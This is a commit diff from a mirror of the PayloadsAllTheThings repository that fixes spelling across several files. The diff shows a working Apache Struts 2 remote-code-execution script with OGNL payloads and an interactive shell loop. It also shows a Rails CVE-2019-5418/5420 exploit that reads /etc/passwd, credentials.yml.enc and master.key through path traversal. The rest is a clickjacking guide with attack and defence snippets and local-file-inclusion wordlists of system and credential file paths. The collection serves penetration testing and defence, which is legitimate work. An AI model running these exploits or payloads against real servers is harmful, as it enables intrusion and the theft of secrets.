ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Fixing spelling errors in PayloadsAllTheThings

Browse Source
This commit is contained in:
Clint Airé 2024-09-16 11:44:29 +01:00
parent 3afbc26c88
commit dc16faecb6
16 changed files with 1199 additions and 899 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
View File

@ -47,23 +47,23 @@ if len(host) > 0:
poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}"
def exploit(commando):
exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+commando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
def exploit(comando):
exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
return exploit
def exploit2(commando):
exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(commando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
def exploit2(comando):
exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
return exploit2
def exploit3(commando):
exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+commando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
def exploit3(comando):
exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
return exploit3
def pwnd(shellfile):
exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
return exploitfile
def validator():
def validador():
arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"]
return arr_lin_win
@ -101,10 +101,10 @@ if len(host) > 0:
while 1:
separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC)
espacio = separador.split(' ')
commando = "','".join(espacio)
comando = "','".join(espacio)
if espacio[0] != 'reverse' and espacio[0] != 'pwnd':
shell = urllib.request.urlopen(host+exploit("'"+str(commando)+"'"))
shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'"))
print("\n"+shell.read())
elif espacio[0] == 'pwnd':
pathsave=input("path EJ:/tmp/: ")
@ -122,8 +122,8 @@ if len(host) > 0:
print(BLUE+" [-] NO VULNERABLE"+ENDC)
print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC)
x = 0
while x < len(validator()):
valida = validator()[x]
while x < len(validador()):
valida = validador()[x]
try:
req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))})
@ -149,7 +149,7 @@ if len(host) > 0:
except:
exit(0)
else:
x = len(validator())
x = len(validador())
else:
print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
except:
@ -160,7 +160,7 @@ if len(host) > 0:
print(BLUE+" [-] NO VULNERABLE"+ENDC)
print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC)
x = 0
while x < len(validator()):
while x < len(validador()):
#Filtramos la url solo dominio
url = host.replace('#', '%23')
url = host.replace(' ', '%20')
@ -174,7 +174,7 @@ if len(host) > 0:
if (file_path == ''):
file_path = '/'
valida = validator()[x]
valida = validador()[x]
try:
result = requests.get(site+"/"+exploit3(str(valida))+file_path).text
@ -194,13 +194,13 @@ if len(host) > 0:
while 1:
separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC)
espacio = separador.split(' ')
commando = "%20".join(espacio)
comando = "%20".join(espacio)
shell = urllib.request.urlopen(host+exploit3(str(commando)))
shell = urllib.request.urlopen(host+exploit3(str(comando)))
print("\n"+shell.read())
else:
x = len(validator())
x = len(validador())
exit(0)
else:
print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))

10
CVE Exploits/Rails CVE-2019-5420.rb
View File

@ -7,12 +7,12 @@ $proxy_addr = '127.0.0.1'
$proxy_port = 8080
$remote = "http://172.18.0.3:3000"
$resource = "/demo"
$ressource = "/demo"
puts "\nRails exploit CVE-2019-5418 + CVE-2019-5420 = RCE\n\n"
print "[+] Checking if vulnerable to CVE-2019-5418 => "
uri = URI($remote + $resource)
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = "../../../../../../../../../../etc/passwd{{"
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
@ -28,7 +28,7 @@ end
print "[+] Getting file => credentials.yml.enc => "
path = "../../../../../../../../../../config/credentials.yml.enc{{"
for $i in 0..9
uri = URI($remote + $resource)
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = path[3..57]
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
@ -46,7 +46,7 @@ end
print "[+] Getting file => master.key => "
path = "../../../../../../../../../../config/master.key{{"
for $i in 0..9
uri = URI($remote + $resource)
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = path[3..57]
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
@ -133,7 +133,7 @@ loop do
if input == "R"
print "[+] Getting result of command => "
uri = URI($remote + $resource)
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = "../../../../../../../../../../tmp/result.txt{{"
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|

285
Clickjacking/README.md
View File

@ -6,157 +6,190 @@
> that a normal user can do on a legitimate website can be done using clickjacking.
## Summary
* [Tools](#tools)
* [Methodology](#methodology)
* [UI Redressing](#ui-redressing)
* [Invisible Frames](#invisible-frames)
* [Button/Form Hijacking](#buttonform-hijacking)
* [Execution Methods](#execution-methods)
* [Preventive Measures](#preventive-measures)
* [Implement X-Frame-Options Header](#implement-x-frame-options-header)
* [Content Security Policy (CSP)](#content-security-policy-csp)
* [Disabling JavaScript](#disabling-javascript)
* [OnBeforeUnload Event](#onbeforeunload-event)
* [XSS Filter](#xss-filter)
* [IE8 XSS filter](#ie8-xss-filter)
* [Chrome 4.0 XSSAuditor filter](#chrome-40-xssauditor-filter)
* [Challenge](#challenge)
* [Practice Environments](#practice-environments)
* [Reference](#references)
- [Tools](#tools)
- [Methodology](#methodology)
- [UI Redressing](#ui-redressing)
- [Invisible Frames](#invisible-frames)
- [Button/Form Hijacking](#buttonform-hijacking)
- [Execution Methods](#execution-methods)
- [Preventive Measures](#preventive-measures)
- [Implement X-Frame-Options Header](#implement-x-frame-options-header)
- [Content Security Policy (CSP)](#content-security-policy-csp)
- [Disabling JavaScript](#disabling-javascript)
- [OnBeforeUnload Event](#onbeforeunload-event)
- [XSS Filter](#xss-filter)
- [IE8 XSS filter](#ie8-xss-filter)
- [Chrome 4.0 XSSAuditor filter](#chrome-40-xssauditor-filter)
- [Challenge](#challenge)
- [Practice Environments](#practice-environments)
- [Reference](#references)
## Tools
* [Burp Suite](https://portswigger.net/burp)
* [OWASP ZAP](https://github.com/zaproxy/zaproxy)
* [Clickjack](https://github.com/machine1337/clickjack)
- [Burp Suite](https://portswigger.net/burp)
- [OWASP ZAP](https://github.com/zaproxy/zaproxy)
- [Clickjack](https://github.com/machine1337/clickjack)
## Methodology
### UI Redressing
UI Redressing is a Clickjacking technique where an attacker overlays a transparent UI element on top of a legitimate website or application.
The transparent UI element contains malicious content or actions that are visually hidden from the user. By manipulating the transparency and positioning of elements,
UI Redressing is a Clickjacking technique where an attacker overlays a transparent UI element on top of a legitimate website or application.
The transparent UI element contains malicious content or actions that are visually hidden from the user. By manipulating the transparency and positioning of elements,
the attacker can trick the user into interacting with the hidden content, believing they are interacting with the visible interface.
* **How UI Redressing Works:**
* Overlaying Transparent Element: The attacker creates a transparent HTML element (usually a `<div>`) that covers the entire visible area of a legitimate website. This element is made transparent using CSS properties like `opacity: 0;`.
* Positioning and Layering: By setting the CSS properties such as `position: absolute; top: 0; left: 0;`, the transparent element is positioned to cover the entire viewport. Since it's transparent, the user doesn't see it.
* Misleading User Interaction: The attacker places deceptive elements within the transparent container, such as fake buttons, links, or forms. These elements perform actions when clicked, but the user is unaware of their presence due to the overlaying transparent UI element.
* User Interaction: When the user interacts with the visible interface, they are unknowingly interacting with the hidden elements due to the transparent overlay. This interaction can lead to unintended actions or unauthorized operations.
- **How UI Redressing Works:**
- Overlaying Transparent Element: The attacker creates a transparent HTML element (usually a `<div>`) that covers the entire visible area of a legitimate website. This element is made transparent using CSS properties like `opacity: 0;`.
- Positioning and Layering: By setting the CSS properties such as `position: absolute; top: 0; left: 0;`, the transparent element is positioned to cover the entire viewport. Since it's transparent, the user doesn't see it.
- Misleading User Interaction: The attacker places deceptive elements within the transparent container, such as fake buttons, links, or forms. These elements perform actions when clicked, but the user is unaware of their presence due to the overlaying transparent UI element.
- User Interaction: When the user interacts with the visible interface, they are unknowingly interacting with the hidden elements due to the transparent overlay. This interaction can lead to unintended actions or unauthorized operations.
```html
<div style="opacity: 0; position: absolute; top: 0; left: 0; height: 100%; width: 100%;">
<div
style="opacity: 0; position: absolute; top: 0; left: 0; height: 100%; width: 100%;"
>
<a href="malicious-link">Click me</a>
</div>
```
### Invisible Frames
Invisible Frames is a Clickjacking technique where attackers use hidden iframes to trick users into interacting with content from another website unknowingly.
These iframes are made invisible by setting their dimensions to zero (height: 0; width: 0;) and removing their borders (border: none;).
Invisible Frames is a Clickjacking technique where attackers use hidden iframes to trick users into interacting with content from another website unknowingly.
These iframes are made invisible by setting their dimensions to zero (height: 0; width: 0;) and removing their borders (border: none;).
The content inside these invisible frames can be malicious, such as phishing forms, malware downloads, or any other harmful actions.
* **How Invisible Frames Work:**
* Hidden IFrame Creation: The attacker includes an `<iframe>` element in a webpage, setting its dimensions to zero and removing its border, making it invisible to the user.
- **How Invisible Frames Work:**
- Hidden IFrame Creation: The attacker includes an `<iframe>` element in a webpage, setting its dimensions to zero and removing its border, making it invisible to the user.
```html
<iframe src="malicious-site" style="opacity: 0; height: 0; width: 0; border: none;"></iframe>
<iframe
src="malicious-site"
style="opacity: 0; height: 0; width: 0; border: none;"
></iframe>
```
* Loading Malicious Content: The src attribute of the iframe points to a malicious website or resource controlled by the attacker. This content is loaded silently without the user's knowledge because the iframe is invisible.
* User Interaction: The attacker overlays enticing elements on top of the invisible iframe, making it seem like the user is interacting with the visible interface. For instance, the attacker might position a transparent button over the invisible iframe. When the user clicks the button, they are essentially clicking on the hidden content within the iframe.
* Unintended Actions: Since the user is unaware of the invisible iframe, their interactions can lead to unintended actions, such as submitting forms, clicking on malicious links, or even performing financial transactions without their consent.
- Loading Malicious Content: The src attribute of the iframe points to a malicious website or resource controlled by the attacker. This content is loaded silently without the user's knowledge because the iframe is invisible.
- User Interaction: The attacker overlays enticing elements on top of the invisible iframe, making it seem like the user is interacting with the visible interface. For instance, the attacker might position a transparent button over the invisible iframe. When the user clicks the button, they are essentially clicking on the hidden content within the iframe.
- Unintended Actions: Since the user is unaware of the invisible iframe, their interactions can lead to unintended actions, such as submitting forms, clicking on malicious links, or even performing financial transactions without their consent.
### Button/Form Hijacking
Button/Form Hijacking is a Clickjacking technique where attackers trick users into interacting with invisible or hidden buttons/forms, leading to unintended actions on a legitimate website. By overlaying deceptive elements on top of visible buttons or forms, attackers can manipulate user interactions to perform malicious actions without the user's knowledge.
* **How Button/Form Hijacking Works:**
* Visible Interface: The attacker presents a visible button or form to the user, encouraging them to click or interact with it.
```html
<button onclick="submitForm()">Click me</button>
```
* Invisible Overlay: The attacker overlays this visible button or form with an invisible or transparent element that contains a malicious action, such as submitting a hidden form.
```html
<form action="malicious-site" method="POST" id="hidden-form" style="display: none;">
- **How Button/Form Hijacking Works:**
- Visible Interface: The attacker presents a visible button or form to the user, encouraging them to click or interact with it.
```html
<button onclick="submitForm()">Click me</button>
```
- Invisible Overlay: The attacker overlays this visible button or form with an invisible or transparent element that contains a malicious action, such as submitting a hidden form.
```html
<form
action="malicious-site"
method="POST"
id="hidden-form"
style="display: none;"
>
<!-- Hidden form fields -->
</form>
```
* Deceptive Interaction: When the user clicks the visible button, they are unknowingly interacting with the hidden form due to the invisible overlay. The form is submitted, potentially causing unauthorized actions or data leakage.
```html
<button onclick="submitForm()">Click me</button>
<form action="legitimate-site" method="POST" id="hidden-form">
<!-- Hidden form fields -->
</form>
<script>
function submitForm() {
document.getElementById('hidden-form').submit();
}
</script>
```
</form>
```
- Deceptive Interaction: When the user clicks the visible button, they are unknowingly interacting with the hidden form due to the invisible overlay. The form is submitted, potentially causing unauthorized actions or data leakage.
```html
<button onclick="submitForm()">Click me</button>
<form action="legitimate-site" method="POST" id="hidden-form">
<!-- Hidden form fields -->
</form>
<script>
function submitForm() {
document.getElementById("hidden-form").submit();
}
</script>
```
### Execution Methods
* Creating Hidden Form: The attacker creates a hidden form containing malicious input fields, targeting a vulnerable action on the victim's website. This form remains invisible to the user.
- Creating Hidden Form: The attacker creates a hidden form containing malicious input fields, targeting a vulnerable action on the victim's website. This form remains invisible to the user.
```html
<form action="malicious-site" method="POST" id="hidden-form" style="display: none;">
<input type="hidden" name="username" value="attacker">
<input type="hidden" name="action" value="transfer-funds">
</form>
```
* Overlaying Visible Element: The attacker overlays a visible element (button or form) on their malicious page, encouraging users to interact with it. When the user clicks the visible element, they unknowingly trigger the hidden form's submission.
* Example in javascript:
```js
function submitForm() {
document.getElementById('hidden-form').submit();
}
<form
action="malicious-site"
method="POST"
id="hidden-form"
style="display: none;"
>
<input type="hidden" name="username" value="attacker" />
<input type="hidden" name="action" value="transfer-funds" />
</form>
```
- Overlaying Visible Element: The attacker overlays a visible element (button or form) on their malicious page, encouraging users to interact with it. When the user clicks the visible element, they unknowingly trigger the hidden form's submission.
- Example in javascript:
```js
function submitForm() {
document.getElementById("hidden-form").submit();
}
```
## Preventive Measures
### Implement X-Frame-Options Header
Implement the X-Frame-Options header with the DENY or SAMEORIGIN directive to prevent your website from being embedded within an iframe without your consent.
```apache
Header always append X-Frame-Options SAMEORIGIN
```
### Content Security Policy (CSP)
Use CSP to control the sources from which content can be loaded on your website, including scripts, styles, and frames.
Use CSP to control the sources from which content can be loaded on your website, including scripts, styles, and frames.
Define a strong CSP policy to prevent unauthorized framing and loading of external resources.
Example in HTML meta tag:
```html
<meta http-equiv="Content-Security-Policy" content="frame-ancestors 'self';">
<meta http-equiv="Content-Security-Policy" content="frame-ancestors 'self';" />
```
### Disabling JavaScript
* Since these type of client side protections relies on JavaScript frame busting code, if the victim has JavaScript disabled or it is possible for an attacker to disable JavaScript code, the web page will not have any protection mechanism against clickjacking.
* There are three deactivation techniques that can be used with frames:
* Restricted frames with Internet Explorer: Starting from IE6, a frame can have the "security" attribute that, if it is set to the value "restricted", ensures that JavaScript code, ActiveX controls, and re-directs to other sites do not work in the frame.
- Since these type of client side protections relies on JavaScript frame busting code, if the victim has JavaScript disabled or it is possible for an attacker to disable JavaScript code, the web page will not have any protection mechanism against clickjacking.
- There are three deactivation techniques that can be used with frames:
- Restricted frames with Internet Explorer: Starting from IE6, a frame can have the "security" attribute that, if it is set to the value "restricted", ensures that JavaScript code, ActiveX controls, and re-directs to other sites do not work in the frame.
```html
<iframe src="http://target site" security="restricted"></iframe>
```
* Sandbox attribute: with HTML5 there is a new attribute called “sandbox”. It enables a set of restrictions on content loaded into the iframe. At this moment this attribute is only compatible with Chrome and Safari.
- Sandbox attribute: with HTML5 there is a new attribute called “sandbox”. It enables a set of restrictions on content loaded into the iframe. At this moment this attribute is only compatible with Chrome and Safari.
```html
<iframe src="http://target site" sandbox></iframe>
```
## OnBeforeUnload Event
* The `onBeforeUnload` event could be used to evade frame busting code. This event is called when the frame busting code wants to destroy the iframe by loading the URL in the whole web page and not only in the iframe. The handler function returns a string that is prompted to the user asking confirm if he wants to leave the page. When this string is displayed to the user is likely to cancel the navigation, defeating targets frame busting attempt.
* The attacker can use this attack by registering an unload event on the top page using the following example code:
```html
<h1>www.fictitious.site</h1>
<script>
window.onbeforeunload = function()
{
return " Do you want to leave fictitious.site?";
}
</script>
<iframe src="http://target site">
```
- The `onBeforeUnload` event could be used to evade frame busting code. This event is called when the frame busting code wants to destroy the iframe by loading the URL in the whole web page and not only in the iframe. The handler function returns a string that is prompted to the user asking confirm if he wants to leave the page. When this string is displayed to the user is likely to cancel the navigation, defeating targets frame busting attempt.
* The previous technique requires the user interaction but, the same result, can be achieved without prompting the user. To do this the attacker have to automatically cancel the incoming navigation request in an onBeforeUnload event handler by repeatedly submitting (for example every millisecond) a navigation request to a web page that responds with a _"HTTP/1.1 204 No Content"_ header.
- The attacker can use this attack by registering an unload event on the top page using the following example code:
```html
<h1>www.fictitious.site</h1>
<script>
window.onbeforeunload = function () {
return " Do you want to leave fictitious.site?";
};
</script>
<iframe src="http://target site"></iframe>
```
- The previous technique requires the user interaction but, the same result, can be achieved without prompting the user. To do this the attacker have to automatically cancel the incoming navigation request in an onBeforeUnload event handler by repeatedly submitting (for example every millisecond) a navigation request to a web page that responds with a _"HTTP/1.1 204 No Content"_ header.
<br>_204 page:_
```php
<?php
header("HTTP/1.1 204 No Content");
?>
```
_Attacker's Page_
```js
<script>
var prevent_bust = 0;
@ -176,46 +209,64 @@ _Attacker's Page_
## XSS Filter
### IE8 XSS filter
### IE8 XSS filter
This filter has visibility into all parameters of each request and response flowing through the web browser and it compares them to a set of regular expressions in order to look for reflected XSS attempts. When the filter identifies a possible XSS attacks; it disables all inline scripts within the page, including frame busting scripts (the same thing could be done with external scripts). For this reason an attacker could induce a false positive by inserting the beginning of the frame busting script into a requests parameters.
```html
<script>
if ( top != self )
{
top.location=self.location;
}
</script>
```
Attacker View:
```html
<iframe src=”http://target site/?param=<script>if”>
```
```html
<script>
if (top != self) {
top.location = self.location;
}
</script>
```
Attacker View:
```html
<iframe src=”http://target site/?param=<script>if”>
```
### Chrome 4.0 XSSAuditor filter
It has a little different behaviour compared to IE8 XSS filter, in fact with this filter an attacker could deactivate a “script” by passing its code in a request parameter. This enables the framing page to specifically target a single snippet containing the frame busting code, leaving all the other codes intact.
Attacker View:
```html
<iframe src=”http://target site/?param=if(top+!%3D+self)+%7B+top.location%3Dself.location%3B+%7D”>
```
Attacker View:
```html
<iframe src=”http://target
site/?param=if(top+!%3D+self)+%7B+top.location%3Dself.location%3B+%7D”>
```
## Challenge
Inspect the following code:
```html
<div style="position: absolute; opacity: 0;">
<iframe src="https://legitimate-site.com/login" width="500" height="500"></iframe>
<iframe
src="https://legitimate-site.com/login"
width="500"
height="500"
></iframe>
</div>
<button onclick="document.getElementsByTagName('iframe')[0].contentWindow.location='malicious-site.com';">Click me</button>
<button
onclick="document.getElementsByTagName('iframe')[0].contentWindow.location='malicious-site.com';"
>
Click me
</button>
```
Determine the Clickjacking vulnerability within this code snippet. Identify how the hidden iframe is being used to exploit the user's actions when they click the button, leading them to a malicious website.
## Practice Environments
* [OWASP WebGoat](https://owasp.org/www-project-webgoat/)
* [Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking)
- [OWASP WebGoat](https://owasp.org/www-project-webgoat/)
- [Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking)
## References
* [Clickjacker.io - Saurabh Banawar](https://clickjacker.io)
* [Web-Security Clickjacking - PortSwigger](https://portswigger.net/web-security/clickjacking)
* [Synopsis Clickjacking](https://www.synopsis.com/glossary/what-is-clickjacking.html#B)
* [OWASP - Gustav Rydstedt](https://owasp.org/www-community/attacks/Clickjacking)
* [SecTheory](http://www.sectheory.com/clickjacking.htm)
- [Clickjacker.io - Saurabh Banawar](https://clickjacker.io)
- [Web-Security Clickjacking - PortSwigger](https://portswigger.net/web-security/clickjacking)
- [Synopsys Clickjacking](https://www.synopsys.com/glossary/what-is-clickjacking.html#B)
- [OWASP - Gustav Rydstedt](https://owasp.org/www-community/attacks/Clickjacking)
- [SecTheory](http://www.sectheory.com/clickjacking.htm)

4
File Inclusion/Intruders/JHADDIX_LFI.txt
View File

@ -209,9 +209,9 @@ d:\System32\Inetsrv\metabase.xml
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/acces_log
/etc/httpd/logs/access.log
/etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/access.log
../../../../../../../etc/httpd/logs/acces.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
../../../../../etc/httpd/logs/access_log

408
File Inclusion/Intruders/List_Of_File_To_Include.txt
View File

@ -3,12 +3,12 @@
\apache2\log\error_log
\apache2\log\error.log
/apache2/logs/access.log
/apache2/logs/access.log
/apache2/logs/access.log
\apache2\logs\access_log
\apache2\logs\access.log
/apache2/logs/access.log%00
/apache2/logs/error.log
/apache2/logs/error.log
/apache2/logs/error.log
\apache2\logs\error_log
\apache2\logs\error.log
/apache2/logs/error.log%00
@ -18,21 +18,21 @@
\apache\log\error.log
/apache/logs/access.log
/apache/logs/access.log
/apache/logs/access.log
/apache/logs/access.log
\apache\logs\access_log
\apache\logs\access.log
/apache/logs/access.log%00
/apache/logs/error.log
/apache/logs/error.log
/apache/logs/error.log
/apache/logs/error.log
\apache\logs\error_log
\apache\logs\error.log
/apache/logs/error.log%00
/apache\php\php.ini
/apache\php\php.ini
/apache\php\php.ini
/apache\php\php.ini%00
/bin/php.ini
/bin/php.ini
/bin/php.ini
/bin/php.ini%00
c:\apache\php\php.ini
C:\apache\php\php.ini
@ -92,90 +92,90 @@ etc%5cpasswd%00
/etc/apache2/apache2.conf
/etc/apache2.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/conf/httpd.conf%00
/etc/apache2/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/httpd.conf%00
/etc/apache2/sites-available/default
/etc/apache2/sites-enabled/000-default
/etc/apache/apache.conf
/etc/apache/conf/httpd.conf
/etc/apache/conf/httpd.conf
/etc/apache/conf/httpd.conf
/etc/apache/conf/httpd.conf%00
/etc/apache/httpd.conf
etc%c0%afpasswd
etc%c0%afpasswd%00
/etc/chrootUsers
/etc/chrootUsers
/etc/chrootUsers
/etc/chrootUsers%00
/etc/crontab
/etc/fstab
/etc/ftpchroot
/etc/ftpchroot
/etc/ftpchroot
/etc/ftpchroot%00
/etc/ftphosts
/etc/ftphosts
/etc/ftphosts
/etc/ftphosts%00
/etc/group
/etc/group
/etc/group
/etc/group%00
/etc/hosts
/etc/http/conf/httpd.conf
/etc/http/conf/httpd.conf
/etc/http/conf/httpd.conf
/etc/http/conf/httpd.conf%00
/etc/httpd.conf
/etc/httpd.conf
/etc/httpd.conf
/etc/httpd.conf%00
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf%00
/etc/httpd/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/httpd.conf%00
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access.log
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/access.log%00
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access.log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log%00
/etc/httpd/logs/error.log%00
/etc/httpd/php.ini
/etc/httpd/php.ini
/etc/httpd/php.ini
/etc/httpd/php.ini%00
/etc/http/httpd.conf
/etc/http/httpd.conf
/etc/http/httpd.conf
/etc/http/httpd.conf%00
/etc/inittab
/etc/issue
/etc/issue
/etc/issue
/etc/logrotate.d/ftp
/etc/logrotate.d/ftp
/etc/logrotate.d/ftp
/etc/logrotate.d/ftp%00
/etc/logrotate.d/proftpd
/etc/logrotate.d/proftpd
/etc/logrotate.d/proftpd
/etc/logrotate.d/proftpd%00
/etc/logrotate.d/vsftpd.log
/etc/logrotate.d/vsftpd.log
/etc/logrotate.d/vsftpd.log
/etc/logrotate.d/vsftpd.log%00
/etc/master.passwd
/etc/motd
/etc/motd
/etc/motd
/etc/my.cnf
/etc/my.cnf
/etc/my.cnf
/etc/my.cnf%00
/etc/mysql/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf%00
/etc/nginx.conf
/etc/nginx/nginx.conf
@ -184,125 +184,125 @@ etc%c0%afpasswd%00
/etc/pam.d/proftpd
/..\..\\..\..\\..\..\\..\..\\\/etc/passwd
/etc/passwd
/etc/passwd
/etc/passwd
/etc/passwd%00
etc/passwd%00
/etc/php4.4/fcgi/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4.4/fcgi/php.ini%00
/etc/php4/apache2/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache2/php.ini%00
/etc/php4/apache/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache/php.ini
